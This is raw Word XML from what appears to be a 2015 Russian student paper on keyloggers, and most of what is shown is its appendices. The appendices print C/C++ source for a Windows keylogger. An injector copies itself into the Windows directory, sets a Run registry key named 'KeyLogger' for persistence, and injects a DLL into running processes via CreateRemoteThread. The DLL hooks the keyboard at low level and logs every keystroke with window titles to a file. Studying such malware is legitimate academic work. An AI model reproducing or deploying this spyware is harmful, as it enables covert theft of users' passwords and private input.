          <w:t>https://securelist.ru/analysis/77/klaviaturny-e-shpiony-varianty-realiz/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02139" w:rsidRDefault="00F02139" w:rsidP="00F02139">
      <w:pPr>
        <w:pStyle w:val="ae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DLL </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Wikipedia</w:t>
      </w:r>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>[Электронный ресурс]. – Электронные данные. –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00B4279B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/DLL_injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02139" w:rsidRPr="00F02139" w:rsidRDefault="00F02139" w:rsidP="00F02139">
      <w:pPr>
        <w:pStyle w:val="ae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  <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02139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лавиатурные шпионы (кейлоггеры)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>[Электронный ресурс]. – Электронные данные.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - http://www.cyberguru.ru/operating-systems/windows-security/keyloggers-page17.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRDefault="00267D34">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="001B7A51" w:rsidRDefault="00546BF2" w:rsidP="00546BF2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc418435891"/>
      <w:bookmarkStart w:id="40" w:name="_Toc420629807"/>
      <w:bookmarkStart w:id="41" w:name="_Toc420752658"/>
      <w:r w:rsidRPr="00A5531C">
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7A51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:t>А</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00546BF2" w:rsidRDefault="00267D34" w:rsidP="00586F7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2" w:name="_Toc420705273"/>
      <w:bookmarkStart w:id="43" w:name="_Toc420752659"/>
      <w:r w:rsidRPr="00546BF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг кода исполняемого файла:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="001B7A51" w:rsidRDefault="00267D34" w:rsidP="00267D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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#define _CRT_SECURE_NO_WARNINGS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#include &lt;Windows.h&gt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#include &lt;stdio.h&gt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#include &lt;TlHelp32.h&gt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bool Inject(DWORD pId, char *dllNam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bool Install(char* injectionDllNam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int main(int argc, char** argv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HANDLE hProcessSnap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PROCESSENTRY32 pe32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har szFilename[] = ""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har *injectionDllName = "\\InjectionDll.dll"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har dllPath[MAX_PATH]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WindowsDirectory(dllPath, MAX_PATH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at(dllPath, injectionDllNam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"Install:"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Install(injectionDllName)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"success."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hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 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hProcessSnap == INVALID_HANDLE_VALUE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pe32.dwSize = sizeof(PROCESSENTRY32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do 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!Process32Next(hProcessSnap, &amp;pe32)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std::cout &lt;&lt; "Can't find Process:"&lt;&lt; szFilename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leep(10000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Inject(pe32.th32ProcessID, dllPath)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"Injection success:" &lt;&lt; pe32.szExeFile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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>} while (/*lstrcmpi(pe32.szExeFile, szFilename)*/tru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Sleep(10000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0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bool Install(char* injectionDllName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HKEY h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har currentPath[MAX_PATH],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ysbuf[MAX_PATH],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*fileNam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ModuleFileName(GetModuleHandle(NULL), currentPath, MAX_PATH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fileName = strrchr(currentPath, '\\'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WindowsDirectory(sysbuf, MAX_PATH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at(sysbuf, fileNam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!CopyFile(currentPath, sysbuf, false)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"Error: Can't copy file:"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sysbuf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ERROR_SUCCESS == RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &amp;hk)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gSetValueEx(hk, "KeyLogger", 0, REG_SZ, (LPBYTE) sysbuf, strlen(sysbuf)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gCloseKey(hk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else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"Error: Can't create RegKey."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ModuleFileName(GetModuleHandle(NULL), currentPath, MAX_PATH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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>GetWindowsDirectory(sysbuf, MAX_PATH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fileName, injectionDllNam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at(sysbuf, fileNam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!CopyFile(currentPath, sysbuf, false)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"Error: Can't copy file:"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sysbuf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tru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bool Inject(DWORD pId, char *dllName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HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, false, pId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h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LPVOID LoadLibAddr = (LPVOID) GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA"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LoadLibAddr == NULL) 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"Error: the LoadLibraryA function was not found inside kernel32.dll library.\n"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Sleep(10000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LPVOID dereercomp = VirtualAllocEx(h, NULL, strlen(dllName), MEM_COMMIT | MEM_RESERVE, PAGE_READWRIT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dereercomp == NULL) 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"Error: the memory could not be allocated inside the chosen process.\n"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Sleep(10000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int n = WriteProcessMemory(h, dereercomp, dllName, strlen(dllName), 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n == 0) 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"Error: there was no bytes written to the process's address space.\n"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lastRenderedPageBreak/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Sleep(10000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HANDLE asdc = CreateRemoteThread(h, NULL, NULL, (LPTHREAD_START_ROUTINE) LoadLibAddr, dereercomp, 0, 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asdc == NULL) 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printf("Error: the remote thread could not be created.\n"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Sleep(10000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WaitForSingleObject(asdc, INFINIT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VirtualFreeEx(h, dereercomp, strlen(dllName), MEM_RELEAS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CloseHandle(asdc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CloseHandle(h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tru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d::cout &lt;&lt; "Error: Can't open process:" &lt;&lt; pId &lt;&lt; std::end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//Sleep(10000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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00ED24ED" w:rsidRDefault="00267D34" w:rsidP="00586F7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4" w:name="_Toc420705274"/>
      <w:bookmarkStart w:id="45" w:name="_Toc420752660"/>
      <w:r w:rsidRPr="00ED24ED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ED24E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ED24ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кода</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED24E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ED24ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>инжектируемой</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED24E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ED24ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>библиотеки</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED24ED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bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00ED24ED" w:rsidRDefault="00267D34" w:rsidP="00267D34">
      <w:pPr>
        <w:rPr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#define _CRT_SECURE_NO_WARNINGS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#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00ED24ED" w:rsidRDefault="007403D3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#include &lt;stdio.h&gt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#define MAX_BUFSIZE 30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#define MAX_MODULE_NAME 260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HANDLE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fil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HHOOK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hoo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DWORD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prevWinID = NUL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CHAR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prevModuleName[MAX_MODULE_NAME],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g_buf[MAX_BUFSIZE],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glPath[] = "D:\\"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BOOL getCharKey(const DWORD vkCode, const DWORD scanCode, LPWORD ch, const DWORD winID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BYTE keyState[256]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KeyboardState(keyStat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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>return ToAsciiEx(vkCode, scanCode, keyState, ch, 0, GetKeyboardLayout(winID)) == 1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BOOL getSysKey(const DWORD vkCode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har * buf = g_buf + strlen(g_buf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witch (vkCode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1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1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2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2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3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3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4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4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5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5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6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6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7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7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8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8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9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9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10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10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11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11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F12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F12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BACK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BACK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TAB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TAB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RETURN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RET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RCONTROL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RCTRL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LCONTROL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CTRL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ESCAPE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ESC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SPACE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SPACE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RSHIFT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RSHIFT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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>case VK_LSHIFT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SHIFT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CAPITAL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CAPSLOCK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DELETE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DELETE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INSERT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INSERT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LWIN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WIN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RWIN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RWIN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UP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UP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DOWN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DOWN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LEFT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LEFT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RIGHT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RIGHT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HOME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HOME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END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END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PRIOR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PGDN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NEXT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PGUP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LMENU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ALT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ase VK_RMENU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, "[RALT]\r\n"); break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default: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ALS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TRU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LRESULT CALLBACK LowLevelKeyboardHook(int nCode, WPARAM wParam, LPARAM lParam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KeyState(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nCode == HC_ACTION &amp;&amp; (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN)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DWORD written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lastRenderedPageBreak/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KBDLLHOOKSTRUCT *ks = (KBDLLHOOKSTRUCT*) lParam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YSTEMTIME st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CHAR moduleName[MAX_MODULE_NAME]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DWORD winID = NULL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HWND activeWindow = GetForegroundWindow(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WindowThreadProcessId(activeWindow, &amp;winID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WindowText(activeWindow, moduleName, MAX_MODULE_NAM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winID != prevWinID || strcmp(moduleName, prevModuleName)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prevWinID = winID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prevModuleName, moduleNam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printf(moduleName + strlen(moduleName), " : %d", winID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at(moduleName, "\r\n"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WriteFile(file, moduleName, strlen(moduleName), &amp;written, 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LocalTime(&amp;st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TimeFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, NULL, g_buf, MAX_BUFSIZ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at(g_buf, "</w:t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"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char * buf = g_buf + strlen(g_buf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getSysKey(ks-&gt;vkCode)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WriteFile(file, g_buf, strlen(g_buf), &amp;written, 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else if (getCharKey(ks-&gt;vkCode, ks-&gt;scanCode, (LPWORD) buf, winID)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buf + 1, "\r\n"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WriteFile(file, g_buf, strlen(g_buf), &amp;written, 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else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at(g_buf, "[unknown]\r\n"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WriteFile(file, g_buf, strlen(g_buf), &amp;written, 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GetKeyState(VK_LSHIFT) &amp; GetKeyState(VK_RSHIFT) &amp; 0x0100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PostQuitMessage(0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CallNextHookEx(hook, nCode, wParam, lParam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bool CreateLogFile(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HAR fileName[MAX_PATH]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YSTEMTIME st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DWORD fileNum = 1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LocalTime(&amp;st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GetDateFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, "dd.MM.yy", fileName, MAX_PATH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har * ptrAfterSyl_ = fileName + strlen(fileName) + 1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at(fileName, "_1.txt"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har path[MAX_PATH]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path, glPath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at(path, fileNam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file = CreateFile(path, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 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while (GetLastError() == ERROR_FILE_EXISTS)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fileNum++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wsprintf(ptrAfterSyl_, "%d", fileNum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at(fileName, ".txt"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py(path, glPath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strcat(path, fileName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file = CreateFile(path, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 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file != INVALID_HANDLE_VALUE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>BOOL AP</w:t>
      </w:r>
      <w:r w:rsidR="007403D3" w:rsidRPr="00ED24ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED24E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HANDLE mutex = CreateMutex(NULL, FALSE, "KeyboardLogger");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00ED24ED" w:rsidRDefault="00267D34" w:rsidP="007403D3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GetLastError() == ERROR_ALREADY_EXISTS || GetLast</w:t>
      </w:r>
      <w:r w:rsidR="007403D3" w:rsidRPr="00ED24ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error() == ERROR_ACCESS_DENIED)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00ED24ED" w:rsidRDefault="007403D3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lastRenderedPageBreak/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1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00ED24ED" w:rsidRDefault="007403D3" w:rsidP="007403D3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if (!CreateLogFile())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leaseMutex(mutex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1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HINSTANCE instance = GetModuleHandle(NULL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hook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardHook, instance, 0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MSG msg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wh</w:t>
      </w:r>
      <w:r w:rsidR="007403D3" w:rsidRPr="00ED24ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ile (GetMessage(&amp;msg, 0, 0, 0))</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED24E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TranslateMessage(&amp;msg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</w:r>
      <w:r w:rsidRPr="00ED24ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>DispatchMessage(&amp;msg);}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leaseMutex(mutex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UnhookWindowsHookEx(hook);</w:t>
      </w:r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CloseHandle(file);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655AC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  <w:r w:rsidRPr="00ED24ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>return TRUE;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655AC" w:rsidRDefault="005655AC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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:rsidR="005655AC" w:rsidRDefault="005655AC" w:rsidP="005655AC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:firstLine="0"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc420752661"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ Б</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="005655AC" w:rsidRDefault="005655AC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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:rsidR="005655AC" w:rsidRDefault="005655AC" w:rsidP="005655AC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:firstLine="0"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc420752662"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ В</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00ED24ED" w:rsidRDefault="00267D34" w:rsidP="00267D34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00267D34" w:rsidRPr="00ED2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D23" w:rsidRDefault="00642D23" w:rsidP="00E47FA2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00642D23" w:rsidRDefault="00642D23" w:rsidP="00E4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D23" w:rsidRDefault="00642D23" w:rsidP="00E47FA2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00642D23" w:rsidRDefault="00642D23" w:rsidP="00E4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963B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3589C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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E8E55A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E90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5F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="669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B5A1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD5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C1A0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87C2B4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CC972A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE0A7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F50F13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1C6DF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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E5D3EE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A00F5CC"/>
    <w:lvl w:ilvl="0" w:tplc="7C08A414">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="center"/>
      <w:pPr>
        <w:ind w:left="15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DC"/>
    <w:rsid w:val="000805C5"/>
    <w:rsid w:val="000872BA"/>
    <w:rsid w:val="000B3353"/>
    <w:rsid w:val="000D413B"/>
    <w:rsid w:val="001000EB"/>
    <w:rsid w:val="001673FA"/>
    <w:rsid w:val="001B7A51"/>
    <w:rsid w:val="001C1985"/>
    <w:rsid w:val="001F6F39"/>
    <w:rsid w:val="00205E97"/>
    <w:rsid w:val="00251ACD"/>
    <w:rsid w:val="00267D34"/>
    <w:rsid w:val="002B4BB4"/>
    <w:rsid w:val="002B50CE"/>
    <w:rsid w:val="002E4FAE"/>
    <w:rsid w:val="002E7A2E"/>
    <w:rsid w:val="00335965"/>
    <w:rsid w:val="00347FDC"/>
    <w:rsid w:val="00383DC8"/>
    <w:rsid w:val="00393818"/>
    <w:rsid w:val="003B3C11"/>
    <w:rsid w:val="003E2ED4"/>
    <w:rsid w:val="00403476"/>
    <w:rsid w:val="00430205"/>
    <w:rsid w:val="004C2FC5"/>
    <w:rsid w:val="005155C5"/>
    <w:rsid w:val="00532646"/>
    <w:rsid w:val="00546BF2"/>
    <w:rsid w:val="00546DFB"/>
    <w:rsid w:val="005478C2"/>
    <w:rsid w:val="005655AC"/>
    <w:rsid w:val="00572366"/>
    <w:rsid w:val="005739EC"/>
    <w:rsid w:val="00586F70"/>
    <w:rsid w:val="005B1FF6"/>
    <w:rsid w:val="005E74AB"/>
    <w:rsid w:val="00601F1A"/>
    <w:rsid w:val="00637F4E"/>
    <w:rsid w:val="00642D23"/>
    <w:rsid w:val="006832EA"/>
    <w:rsid w:val="006A38EE"/>
    <w:rsid w:val="006B3D75"/>
    <w:rsid w:val="006D47FF"/>
    <w:rsid w:val="0070493C"/>
    <w:rsid w:val="00712AC9"/>
    <w:rsid w:val="00712C5A"/>
    <w:rsid w:val="0072566D"/>
    <w:rsid w:val="007352E5"/>
    <w:rsid w:val="007403D3"/>
    <w:rsid w:val="00743E0B"/>
    <w:rsid w:val="0077143A"/>
    <w:rsid w:val="007E450A"/>
    <w:rsid w:val="007F45AA"/>
    <w:rsid w:val="00836C5E"/>
    <w:rsid w:val="00891D34"/>
    <w:rsid w:val="00896423"/>
    <w:rsid w:val="008B09E8"/>
    <w:rsid w:val="008D2F8C"/>
    <w:rsid w:val="008E3478"/>
    <w:rsid w:val="008E387E"/>
    <w:rsid w:val="008E593B"/>
    <w:rsid w:val="008F6440"/>
    <w:rsid w:val="00921EEF"/>
    <w:rsid w:val="009456B2"/>
    <w:rsid w:val="0095536E"/>
    <w:rsid w:val="00984B5C"/>
    <w:rsid w:val="009A6EA9"/>
    <w:rsid w:val="009C1400"/>
    <w:rsid w:val="009D5C90"/>
    <w:rsid w:val="00A16734"/>
    <w:rsid w:val="00A65973"/>
    <w:rsid w:val="00A9269C"/>
    <w:rsid w:val="00AA4103"/>
    <w:rsid w:val="00AC4812"/>
    <w:rsid w:val="00AD1433"/>
    <w:rsid w:val="00AD532A"/>
    <w:rsid w:val="00B709E0"/>
    <w:rsid w:val="00BC2E0F"/>
    <w:rsid w:val="00BF2EC8"/>
    <w:rsid w:val="00BF7284"/>
    <w:rsid w:val="00C203E3"/>
    <w:rsid w:val="00C60C89"/>
    <w:rsid w:val="00C63D18"/>
    <w:rsid w:val="00C774A0"/>
    <w:rsid w:val="00C8742B"/>
    <w:rsid w:val="00C949A2"/>
    <w:rsid w:val="00CA58F9"/>
    <w:rsid w:val="00CD2CDD"/>
    <w:rsid w:val="00D14663"/>
    <w:rsid w:val="00D405F0"/>
    <w:rsid w:val="00DB20E2"/>
    <w:rsid w:val="00DC2314"/>
    <w:rsid w:val="00DF6EF9"/>
    <w:rsid w:val="00E47FA2"/>
    <w:rsid w:val="00E8372C"/>
    <w:rsid w:val="00EC7BFF"/>
    <w:rsid w:val="00ED07C6"/>
    <w:rsid w:val="00ED24ED"/>
    <w:rsid w:val="00EE0EA0"/>
    <w:rsid w:val="00F02139"/>
    <w:rsid w:val="00F07332"/>
    <w:rsid w:val="00F534A9"/>
    <w:rsid w:val="00F75428"/>
    <w:rsid w:val="00F97D6F"/>
    <w:rsid w:val="00FE0B31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75423AC-44F7-476A-B0B8-B50D7B8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72C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6F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7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rsid w:val="00E8372C"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Нумерованный первый уровень"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:rsid w:val="00E8372C"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="-284"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A16734"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00E837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E8372C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a6">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005478C2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9C14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140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14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1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14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140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53264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F6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F64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6F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32E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832EA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00F07332"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="Стиль1"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="13"/>
    <w:rsid w:val="00546BF2"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="567"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="36"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="Стиль1 Знак"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="12"/>
    <w:rsid w:val="00546BF2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b w:val="0"/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="36"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4">
    <w:name w:val="Стиль4"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="40"/>
    <w:qFormat/>
    <w:rsid w:val="005655AC"/>
    <w:pPr>
      <w:spacing w:line="276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40">
    <w:name w:val="Стиль4 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:rsid w:val="005655A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curelist.ru/analysis/77/klaviaturny-e-shpiony-varianty-reali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0;&#1077;&#1081;&#1083;&#1086;&#1075;&#1077;&#1088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DLL_inje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5175-C1FF-41D5-B0BF-02B570AE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26</Pages>
  <Words>3687</Words>
  <Characters>2102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gins Bilbo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Baggins Bilbo</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-03-22T12:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-30T09:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>